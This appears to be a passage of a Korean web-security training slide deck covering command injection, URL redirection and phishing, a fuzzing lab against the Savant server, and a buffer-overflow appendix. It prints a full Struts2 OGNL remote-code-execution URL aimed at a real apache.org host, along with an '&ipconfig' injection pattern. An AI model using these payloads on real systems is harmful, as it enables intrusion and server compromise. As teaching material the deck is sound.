  • 28. 3) Apache Struts2(์ž๋ฐ” ์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ๊ฐœ๋ฐœ ํ”„๋ ˆ์ž„ ์›Œํฌ) ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰ โ€ข http://seclists.org/fulldisclosure/2013/Oct/96 โ€ข โ€œaction:โ€, โ€œredirection:โ€, redirectAction:โ€๊ณผ ๊ฐ™์€ ํŒŒ๋ผ๋ฏธํ„ฐ์— ํŠน์ • ๊ตฌ๋ฌธ ์ „๋‹ฌ 28 http://vmbuild.apache.org/continuum/groupSummary.action?redirect:${%23a%3d(ne w%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d% 23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dne w%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),% 23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRespon se'),%23matr%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletR equest'),%23matt.getWriter().println(%23matr.getRealPath(%22/%22)),%23matt.getWri ter().flush(),%23matt.getWriter().close()} E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
  • 29. 4) ASP ์‰˜ ์ฝ”๋“œ 5) PHP ์‰˜ ์ฝ”๋“œ 29E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
  • 30. 5) JSP ์‰˜ ์ฝ”๋“œ 30E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
  • 31. ์–ธ์–ด๋ณ„ ์ทจ์•ฝํ•œ ํ•จ์ˆ˜ : ์•„๋ž˜ ํ•จ์ˆ˜ ์‚ฌ์šฉ์‹œ ์ฃผ์˜๊ฐ€ ํ•„์š”ํ•จ 31 ๊ตฌ๋ถ„ ์ทจ์•ฝํ•œ ํ•จ์ˆ˜ PHP require(), include(), eval(), exec(), passthru(), system(), fopen ๋“ฑ PERL open(), sysopen(), glob(), system() ๋“ฑ JAVA system.* (system.runtime) ๋“ฑ C system(), exec(), strcpy(), strcat(), sprint() ๋“ฑ PYTHON exec(), eval(), execfile(), compile(), input() ๋“ฑ E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
  • 32. โ€ข ํŒŒ๋ผ๋ฏธํ„ฐ๋กœ ๋ฐ›์€ URL ์ฃผ์†Œ๋กœ ํŽ˜์ด์ง€ ์ด๋™ โ€ข ํ”ผ์‹ฑ ์œ„ํ—˜ โ€ข ํ˜•ํƒœ http://์‹ ๋ขฐํ• ์ˆ˜์žˆ๋Š”์‚ฌ์ดํŠธ/redirect.asp?target=http://malicious.com Phishing์ด๋ž€? Private Data + fishing์˜ ํ•ฉ์„ฑ์–ด ์ด๋ฉ”์ผ ๋˜๋Š” ์ŠคํŒธ ๋“ฑ์„ ๋ฐœ์†ก ๋ฐ ์ ‘์†์ž๋“ค์„ ํŠน์ • ์‚ฌ์ดํŠธ์™€ ๋™์ผํ•œ ๊ฐ€์งœ ์‚ฌ์ดํŠธ๋กœ ์ ‘์† ๏ƒ  ์ฃผ๋ฏผ๋“ฑ๋ก๋ฒˆํ˜ธ, ์€ํ–‰ ๊ณ„์ขŒ ํ˜น์€ ์‹ ์šฉ์นด๋“œ ๋ฒˆํ˜ธ ํƒˆ์ทจ Phishing์˜ ์œ ๋ž˜ 1996๋…„ AOL(American Online)์„ ์‚ฌ์šฉํ•˜๋˜ 10๋Œ€๋“ค์ด ์ผ๋ฐ˜ ์‚ฌ์šฉ์ž์—๊ฒŒ ๊ฐ€์งœ ์ด๋ฉ”์ผ์„ ๋ณด๋‚ด๋Š” ํ•ดํ‚น ๊ธฐ ๋ฒ•์œผ๋กœ ์œ ๋ž˜๋จ. 32E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
  • 33. โ€ข ๋ณด์•ˆ ๋‰ด์Šค ์ฐธ๊ณ  ๊ธฐ์‚ฌ : http://www.boannews.com/media/view.asp?idx=45812 โ€ข ์Œ๋ž€ ๋™์˜์ƒ ํด๋ฆญ ์‹œ ํ”ผ์‹ฑ ์„œ๋ฒ„๋กœ ์ด๋™ โ€ข ํŽ˜์ด์Šค๋ถ๊ณผ ๋˜‘๊ฐ™์ด ์ƒ๊ธด UI๋กœ ID/Password ์š”์ฒญ 33ํŽ˜์ด์Šค๋ถ ๊ณ„์ • ํƒˆ์ทจ ๋ฐฉ๋ฒ• ๊ฐœ๋…๋„(์ถœ์ฒ˜: ์ด์ŠคํŠธ์†Œํ”„ํŠธ) โ–ฒE-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 6) URL Redirection
  • 34. 3. ๋ชจ์˜์‹ค์Šต 1) ๋ช…๋ น์–ด ์‚ฝ์ž… ์ทจ์•ฝ์  ํƒ์ง€ 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€ 34E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 35. 3. ๋ชจ์˜์‹ค์Šต > 1) ๋ช…๋ น์–ด ์‚ฝ์ž… ์ทจ์•ฝ์  ํƒ์ง€ โ€ข ํŒŒ๋ผ๋ฏธํ„ฐ ๋’ค์— ๋ช…๋ น์–ด ์‚ฝ์ž… ์‹œ ๋ช…๋ น์–ด๊ฐ€ ์‹คํ–‰๋˜๋Š” ์ทจ์•ฝ์ ์„ ํƒ์ง€ํ•œ๋‹ค. โ€ข ์‚ฝ์ž… ํŒจํ„ด : &ipconfig โ€ข ํƒ์ง€ ํŒจํ„ด : 255.255.25 โ€ข ์ž‘์„ฑํ•œ ํƒ์ง€ ํŒจํ„ด 35E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 36. โ€ข ํƒ์ง€ ๊ฒฐ๊ณผ โ€ข ์„œ๋ฒ„์—์„œ netmask๋ฅผ 255.255.254๋กœ ๋ฐ”๊พผ ๊ฒƒ์œผ๋กœ ๋ณด์ž„ 36E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์˜์‹ค์Šต > 1) ๋ช…๋ น์–ด ์‚ฝ์ž… ์ทจ์•ฝ์  ํƒ์ง€
  • 37. http://cafe.naver.com/sec/13325 1. Savant โ€ข BOF ์ทจ์•ฝ์ ์ด ์กด์žฌํ•˜๋Š” ์„œ๋ฒ„ 2. Taof โ€ข ์›น ์„œ๋ฒ„ fuzzer 3. ์‹œ์—ฐ ๋™์˜์ƒ 37E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์˜์‹ค์Šต > 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€
  • 38. โ€ข ํ”„๋ก์‹œ ์„œ๋ฒ„๋ฅผ ์ƒ์„ฑํ•˜์—ฌ ์›น๋ธŒ๋ผ์šฐ์ €๋กœ ์ ‘์† ์‹œ ์š”์ฒญ ํŒจํ‚ท์„ ๊ธฐ๋ก 38E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์˜์‹ค์Šต > 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€
  • 39. โ€ข Fuzzing Points๋ฅผ ์„ค์ •ํ•˜์—ฌ Test ํ•  ๋ฌธ์ž์—ด ๊ธธ์ด๋ฅผ ์ •ํ•จ โ€ข Savant ํ”„๋กœ๊ทธ๋žจ์„ Attachํ•˜์—ฌ ๋น„์ •์ƒ ์ข…๋ฃŒ ์‹œ ํ”„๋กœ๊ทธ๋žจ ๋คํ”„๋ฅผ ์ถ”์ถœ 39E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์˜์‹ค์Šต > 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€
  • 40. โ€ข ํ”„๋กœ๊ทธ๋žจ์ด ์ข…๋ฃŒ ์‹œ ์ถ”์ถœ๋œ ๋คํ”„ 40E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์˜์‹ค์Šต > 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€
  • 41. 41 โ€ข Taof debugging data โ€ข toaf fuzzer๋Š” BOF ์ ๊ฒ€ ์‹œ A๋ฅผ ์‚ฌ์šฉ โ€ข 240 ๋ฌธ์ž์—ด ์‚ฝ์ž… ์ด์ „ ๊ฒฐ๊ณผ ๏ƒ File not found โ€ข 255 ๋ฌธ์ž์—ด ์‚ฝ์ž… ์ดํ›„ ๊ฒฐ๊ณผ ๏ƒ Exception ๋ฐœ์ƒ E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์˜์‹ค์Šต > 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€
  • 42. ๋ถ€๋ก. Direct RET BoF ๏ถ ๋‹ค์Œ๊ณผ ๊ฐ™์€ ํ™˜๊ฒฝ์—๋งŒ ๊ฐ€๋Šฅํ•œ ๊ธฐ๋ฒ•์ด๋‹ค. - Windows XP ๊ธ‰ ๊ธฐ๋ฐ˜(ASLR ๊ธฐ๋ฐ˜ OS๋Š” ์‹คํ–‰ํ•˜๊ธฐ ์–ด๋ ค์›€) - GS-Cookie ๋ฏธ์„ค์ • - DEP ๋ฏธ์„ค์ • ๏ถ ์ด๋ฏธ์ง€๋Š” ์•„๋ž˜ ๋ธ”๋กœ๊ทธ๋ฅผ ์ฐธ๊ณ ํ•˜์˜€๋‹ค. http://fehead.tistory.com/201 42E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 43. 43 โ€ข main() ํ•จ์ˆ˜์—์„œ A() ํ•จ์ˆ˜ ํ˜ธ์ถœ ์‹œ ์Šคํƒ ๋ณ€ํ™” E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ€๋ก. Direct RET BoF
  • 44. โ€ข 98๋ฒˆ ์ฃผ์†Œ์— main()์—์„œ์˜ EIP ์ €์žฅ 44E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ€๋ก. Direct RET BoF
  • 45. โ€ข 97๋ฒˆ ์ฃผ์†Œ์— main()์—์„œ์˜ EBP ์ €์žฅ 45E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ€๋ก. Direct RET BoF
  • 46. โ€ข A() ํ•จ์ˆ˜ ์Šคํƒ ์ƒ์„ฑ 46E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ€๋ก. Direct RET BoF
  • 47. โ€ข C/C++ ๋“ฑ์—์„œ์˜ ๋ฌธ์ž์—ด ์ €์žฅ๋ฐฉ์‹ ๏ƒ  ์•ž ์ฃผ์†Œ ์ง€์ • ๏ƒ  null์ด ๋“ฑ์žฅํ•  ๋•Œ๊นŒ์ง€ ์ฑ„์›€ 47 ๋ฌธ์ž์—ด ์ž…๋ ฅ ๋ฌธ์ž์—ด์„์ฑ„์šฐ๋Š”๋ฐฉํ–ฅ RET ๋ณ€์กฐ ์œ„ํ—˜ E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ€๋ก. Direct RET BoF
  • 48. 48 ์‰˜ ์ฝ”๋“œ ์ž…๋ ฅ ๋ณ€์กฐ๋œ RET โ€ข RET๊ฐ€ ์‰˜ ์ฝ”๋“œ๋ฅผ ๊ฐ€๋ฆฌํ‚ด ๏ƒ  ์‰˜ ์ฝ”๋“œ ์‹คํ–‰ โ€ข RET(EIP)์™€ EBP์— โ€œ41414141โ€์ด ์ž…๋ ฅ๋จ ๏ƒ ๋ณ€์กฐ ๊ฐ€๋Šฅ E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ€๋ก. Direct RET BoF
  • 49. ์ฐธ๊ณ ๋ฌธํ—Œ โ€ข http://fehead.tistory.com/201 โ€ข http://cafe.naver.com/sec/13325 โ€ข http://www.boannews.com/media/view.asp?idx=45812 โ€ข ์›น ๋ชจ์˜ํ•ดํ‚น๊ณผ ์‹œํ์–ด ์ฝ”๋”ฉ ์ง„๋‹จ ๊ฐ€์ด๋“œ ์ตœ๊ฒฝ์ฒ  ์™ธ ์ง€์Œ E-mail: isc0304@naver.com Writing by Ilsun Choi 49